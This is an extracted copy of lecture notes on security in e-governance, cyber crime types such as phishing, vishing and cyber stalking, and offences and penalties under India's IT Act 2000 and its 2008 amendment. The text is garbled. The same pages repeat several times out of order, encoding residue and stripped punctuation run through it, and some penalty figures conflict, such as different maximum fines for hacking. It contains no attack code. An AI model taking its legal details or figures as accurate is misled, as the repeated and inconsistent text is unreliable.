filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
